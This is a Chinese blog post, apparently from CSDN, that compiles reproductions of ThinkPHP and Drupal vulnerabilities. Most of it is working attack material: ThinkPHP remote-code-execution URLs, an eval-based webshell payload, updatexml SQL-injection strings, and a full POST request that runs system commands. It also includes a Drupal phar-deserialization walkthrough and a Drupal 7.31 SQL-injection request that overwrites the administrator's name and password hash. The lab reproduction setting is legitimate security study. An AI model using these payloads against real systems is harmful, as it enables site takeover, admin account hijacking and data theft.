ThinkPHP及Drupal漏洞合集

最新推荐文章于 2024-05-10 20:58:45 发布
最新推荐文章于 2024-05-10 20:58:45 发布
阅读量710 收藏 1
点赞数
分类专栏: 框架漏洞 文章标签: php 框架漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48985780/article/details/119803424
版权

ThinkPHP漏洞

ThinkPHP2.x远程代码执行漏洞

漏洞复现


使用payload 直接访问,即可执行phpinfo():

http://your-ip:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D


利用该漏洞getshell,下面给出一个能够直接蚁剑(菜刀)连接的payload:

/index.php?s=a/b/c/${@print(eval($_POST[1]))}

 

ThinkPHP3.2.3 SQL注入漏洞

明显发现之前的user参数为:0然后被替换为了liao,这样就把:替换掉了。后面的:1明显是替换不掉的:

那么我们将id[1]数组的参数变为0呢?id[]=bind&id[]=0%27&money[]=1123&user=liao

果然造成了注入:POC:money[]=1123&user=liao&id[0]=bind&id[1]=0%20and%20(updatexml(1,concat(0x7e,(select%20user()),0x7e),1))

ttp://127.0.0.1/thinkphp/index.php?name[0]=bind&name[1]=0 and updatexml(2,concat(0x7e,user()),0)

ThinkPHP3和ThinkPHP5日志泄露

 访问该文件,查看日志获取管理员的密码

ThinkPHP5.0.23远程代码执行漏洞

访问http:localhsot:8080可以看到php的默认页面

使用poc进行验证 用post请求提交如下信息

POST /index.php?s=captcha HTTP/1.1
Host: 10.10.10.157
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 75

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd

可以看到发包服务器返回请求如下

写入phpinfo

先查看当前路径pwd

写入phpinfo

访问

 

ThinkPHP5.1.X SQL注入漏洞

最终Payload构造如下:

http://127.0.0.1/tp5.1/public/index/test/index?order[id`,111)|updatexml(1,concat(0x3a,user()),1)%23][]=1

http://127.0.0.1/tp5.1/public/index/test/index?order[id`,'aaa')| updatexml(1,concat(0x3a,user()),1)%23][]=1

 

ThinkPHP6 SQL注入漏洞

sqlmap跑漏洞

Drupal漏洞

Drupal  远程代码执行漏洞

安装成功后如图所示:


如下图所示,先使用管理员用户上传头像,头像图片为构造好的 PoC,参考thezdi/PoC的PoC。


Drupal 的图片默认存储位置为 /sites/default/files/pictures/<YYYY-MM>/,默认存储名称为其原来的名称,所以之后在利用漏洞时,可以知道上传后的图片的具体位置

访问 http://127.0.0.1:8088/admin/config/media/file-system,在 Temporary directory 处输入之前上传的图片路径, phar://./sites/default/files/pictures/2020-07/blog-ZDI-CAN-7232-cat.jpg,保存后将触发该漏洞。如下图所示,触发成功

 

看一下POC,

 

修改一下执行命令,比如ls -al,此时是6个字节数,要把s对应的字节数目改成6:


在Drupal的机制中,设定了这样一条规则:
用户上传的图片文件名将会被保留,如果出现文件名相同的情况,那么文件名后面就会被跟上_0,_1依次递增。

 


再次上传,在 Temporary directory 处输入新的上传的图片路径, phar://./sites/default/files/pictures/2020-07/blog-ZDI-CAN-7232-cat_0.jpg,触发成功。

 

 

将木马存放到你的服务器,之后通过命令来下载

 

Drupal 7.31 SQL注入漏洞

POST /drupal-7.31/?q=node&destination=node HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/drupal-7.31/
Cookie: Drupal.toolbar.collapsed=0; Drupal.tableDrag.showWeight=0; has_js=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 231
name[0%20;update+users+set+name%3d'owned'+,+pass+%3d+'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld'+where+uid+%3d+'1';;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in

本地环境测试效果:

Drupal  访问权限绕过漏洞

安装Drupal 8.7.4版本,登录管理员账户,进入后台/admin/modules,勾选Workspaces模块并安装。

 

在页面上方出现如下页面则安装成功,管理员可以切换Stage模式或者Live模式。

 

另外开启一个浏览器访问首页(未登录任何账户),访问http://127.0.0.1/drupal-8.7.4/node/add/article,可直接添加文章,无需作者或管理员权限。

xzhome
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现】Drupal 远程代码执行漏洞(CVE-2018-7600)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-12 855
Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成该漏洞的产生的根本原因在于Drupal对表单的渲染上,攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻击的网站。...
Drupal 网站漏洞修复以及网站安全防护加固方法
网站安全专家
10-01 443
drupal是目前网站系统使用较多一个开源PHP管理系统,架构使用的是php环境+mysql数据库的环境配置,drupal的代码开发较为严谨,安全性较高,但是再安全的网站系统,也会出现网站漏洞drupal是网站运行访问必不可少的一个分支,为了网站的安全,不被攻击者攻击,我们要对网站以及服务器进行全面的安全加固与安全设置,包括我们服务器安全设置,web安全设置,php环境安全设置,msyql数据库...
2024年ThinkPHP漏洞合集(专注渗透视角)_thinkphp v6,2024年最新网络安全面试数据结构算法
2401_84301389的博客
05-10 1341
服务框架是指某领域一类服务的可复用设计与不完整的实现,与软件框架不同的是,服务框架同时体现着面向服务,一个服务框架可以分为两个主要部分:服务引擎、引入的外部服务。ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。可想而知框架连接着网络和系统接触着越来越多的关键数据,渐渐成为单位公共安全中最具有战略性的资产,框架的安全稳定运行也直接决定着业务系统能否正常使用。
vulhub学习文档-Drupal XSS漏洞
ploto_cs的博客
09-11 1070
Drupal XSS漏洞 一.漏洞介绍 (一)编号 CVE-2019-6341 (二)概述 Drupal诞生于2000年,是一个基于PHP语言编写的开发型CMF(内容管理框架)。在某些情况下,通过文件模块或者子系统上传恶意文件触发XSS漏洞。 (三)影响版本 在7.65之前的Drupal 7版本中; 8.6.13之前的Drupal 8.6版本; 8.5.14之前的Drupal 8.5版本。 (四)漏洞要求 <= Durpal 8.6.6 服务端开启评论配图或者攻击者拥有author以上权限的账号 被
开源框架 Drupal 修复多个访问绕过和 CSRF 漏洞
smellycat000的专栏
09-17 224
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士本周三,Drupal 开发人员通知用户称已发布 Drupal 8.9、9.1和9.2版本更新,修复了五个可导致跨站请求伪造 (CSRF)...
DRUPAL 8.x远程代码执行漏洞(CVE-2018-7600)
errorr0
07-28 1712
drupal命令执行
thinkphp漏洞检测工具
06-06
ThinkPHP漏洞检测工具详解》 ThinkPHP是中国最流行的PHP框架之一,因其强大的功能和易用性深受开发者喜爱。然而,任何软件系统都可能存在安全漏洞ThinkPHP也不例外。为了保障Web应用的安全,开发者和安全专家们...
thinkPHP漏洞检测
最新发布
07-18
thinkPHP漏洞检测
thinkphp 一键漏洞检测
12-09
然而,如同所有软件一样,ThinkPHP也有可能存在安全漏洞,这些漏洞可能被恶意用户利用,对网站造成严重威胁。"thinkphp 一键漏洞检测"工具正是为了解决这个问题而设计的。 该工具适用于ThinkPHP框架的多个版本,从V...
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
### ThinkPHP 5.0 远程代码执行漏洞分析 #### 漏洞背景与概述 ThinkPHP是一款广泛使用的PHP框架,它提供了丰富的功能和良好的性能。然而,如同任何复杂的软件系统一样,它也存在安全漏洞。本次分析的焦点集中在...
漏洞通告ThinkPHP远程代码执行漏洞
05-05
漏洞通告】ThinkPHP远程代码执行漏洞
Drupal远程代码执行漏洞(CVE-2018-7600)
ANOrange的博客
04-10 801
DrupalDrupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。Drupal中带有默认或通用模块配置的多个子系统存在安全漏洞。远程攻击者可利用该漏洞执行任意代码。通过对比官方的补丁,可以得知是请求中存在 # 开头的参数。Drupal Render API 对于 # 有特殊处理。
drupal远程代码执行 (CVE-2018-7600)漏洞学习与复现
seek_2022的博客
12-17 4419
CVE-2018-7600漏洞学习与复现
〖EXP〗Drupal远程代码执行漏洞复现&Ladon批量利用
K8哥哥
08-03 1049
漏洞简介 Drupal是一个开源内容管理系统(CMS),全球超过100万个网站(包括政府,电子零售,企业组织,金融机构等)使用。两周前,Drupal安全团队披露了一个非常关键的漏洞,编号CVE-2018-7600 Drupal对表单请求内容未做严格过滤,因此,这使得攻击者可能将恶意注入表单内容,此漏洞允许未经身份验证的攻击者在默认或常见的Drupal安装上执行远程代码执行。 漏洞分析 https://research.checkpoint.com/uncovering-drupalgeddon-2/ 影响版
Drupal漏洞复现:CVE-2019-6341
weixin_59086772的博客
12-30 2206
近期遇到Drupal漏洞,研究了一下,给大家分享一篇复现,望共鸣 前言: Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。 好哥哥,你等会,你刚才讲的docker我听了个大概,这docker-compose又是啥玩应啊? docker-compose是用python写的一个docker容器管理工具,可以一键启动多个容器、可以一键日卫星。。。。。。假的假的,
Drupal 修复代码执行等漏洞
smellycat000的专栏
07-25 570
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Drupal 开发人员发布安全更新,修复位于该开源内容管理系统 (CMS) 中的多个漏洞Drupal 发布四份安全公告,说明了四个漏洞。其中一个漏洞为“严重”等级的漏洞,其它三个是“中危”级别。Drupal 的评级标准是NIST 常见滥用评级系统而不是CVSS,这四个漏洞的评级为“不太严重”、“中等严重”、“严重”和“...
drupal漏洞复现
qq_45230030的博客
01-04 912
drupal cms 漏洞复现
kali执行php代码的exp,ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用(GetShell)...
weixin_34698515的博客
03-10 678
前言ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。漏洞分析关键代码:// 获取控制器名$controller = strip_tags($result[1]...
thinkphp
一大口木的博客
10-05 235
我是在kali里面搭建的参考首先,看上面的搭建环境,进入vulhub/thinkphp,我们依次进行尝试。在比赛中,我们的目的是执行命令,拿到flag。现在,因为我的比赛只考命令执行,所以只需要命令可以正常执行就行,其他版本的sql注入漏洞、文件包含漏洞什么的就算了。
thinkphp-errors漏洞
04-08
thinkphp-errors漏洞是指在使用ThinkPHP框架时存在的一种安全漏洞。该漏洞的主要原因是在错误处理机制中,未对异常信息进行适当的过滤和处理,导致攻击者可以通过构造恶意请求,获取敏感信息或执行任意代码。 具体...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值